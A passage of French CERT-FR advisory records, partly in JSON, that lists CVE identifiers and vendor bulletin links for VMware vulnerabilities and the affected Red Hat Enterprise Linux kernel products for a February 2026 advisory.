"name": "CVE-2025-38406",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38406"
},
{
"name": "CVE-2025-38352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38352"
},
{
"name": "CVE-2025-38263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38263"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2025-38214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38214"
},
{
"name": "CVE-2025-38218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38218"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2025-38393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38393"
},
{
"name": "CVE-2025-38618",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38618"
},
{
"name": "CVE-2025-38249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38249"
},
{
"name": "CVE-2022-48703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48703"
},
{
"name": "CVE-2025-38154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38154"
},
{
"name": "CVE-2025-38389",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38389"
},
{
"name": "CVE-2025-38448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38448"
},
{
"name": "CVE-2025-38377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38377"
},
{
"name": "CVE-2025-38516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38516"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-38462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38462"
},
{
"name": "CVE-2025-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38428"
},
{
"name": "CVE-2025-38262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38262"
},
{
"name": "CVE-2025-38138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38138"
},
{
"name": "CVE-2023-2975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2975"
},
{
"name": "CVE-2025-38310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38310"
},
{
"name": "CVE-2022-3602",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3602"
},
{
"name": "CVE-2025-37963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37963"
},
{
"name": "CVE-2025-38226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38226"
},
{
"name": "CVE-2025-38443",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38443"
},
{
"name": "CVE-2025-38439",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38439"
},
{
"name": "CVE-2022-1434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1434"
},
{
"name": "CVE-2025-38190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38190"
},
{
"name": "CVE-2025-38180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38180"
},
{
"name": "CVE-2025-38145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38145"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-37948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37948"
},
{
"name": "CVE-2025-8058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8058"
},
{
"name": "CVE-2025-38498",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38498"
},
{
"name": "CVE-2025-38200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38200"
},
{
"name": "CVE-2025-38273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38273"
},
{
"name": "CVE-2025-38346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38346"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2025-38320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38320"
},
{
"name": "CVE-2025-38280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38280"
},
{
"name": "CVE-2025-38084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38084"
},
{
"name": "CVE-2025-38103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38103"
},
{
"name": "CVE-2025-38514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38514"
},
{
"name": "CVE-2025-38204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38204"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2025-38410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38410"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2025-38460",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38460"
},
{
"name": "CVE-2025-38345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38345"
},
{
"name": "CVE-2025-38231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38231"
},
{
"name": "CVE-2025-38181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38181"
},
{
"name": "CVE-2025-38391",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38391"
},
{
"name": "CVE-2024-6923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6923"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
}
],
"initial_release_date": "2025-12-01T00:00:00",
"last_revision_date": "2025-12-01T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-1054",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-12-01T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36558",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36558"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36554",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36554"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36552",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36552"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36559",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36559"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36557",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36557"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36556",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36556"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36553",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36553"
},
{
"published_at": "2025-11-30",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36555",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36555"
}
]
}
CERTFR-2026-AVI-0226
Vulnerability from certfr_avis - Published: 2026-02-27 - Updated: 2026-02-27
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.4 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 8 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - TUS 8.6 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 10 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - TUS 8.8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Real Time 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 9 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 9.6 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 10 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 9 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 8 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 10 aarch64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 8 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Real Time for NFV 8 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 8 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 9 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 9.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server - AUS 8.2 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 9 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64 | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for IBM z Systems 10 s390x | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 9 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for Power, little endian 10 ppc64le | ||
| Red Hat | Red Hat CodeReady Linux Builder | Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux Server | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 | ||
| Red Hat | Red Hat Enterprise Linux | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat Enterprise Linux Server - AUS 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 8 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.4 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 8 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 10 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 9 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 10 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 9 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 8 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 10 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 8 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time for NFV 8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 8 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 9 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 10 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.2 x86_64",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 9 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 10 s390x",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 9 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 10 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le",
"product": {
"name": "Red Hat CodeReady Linux Builder",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
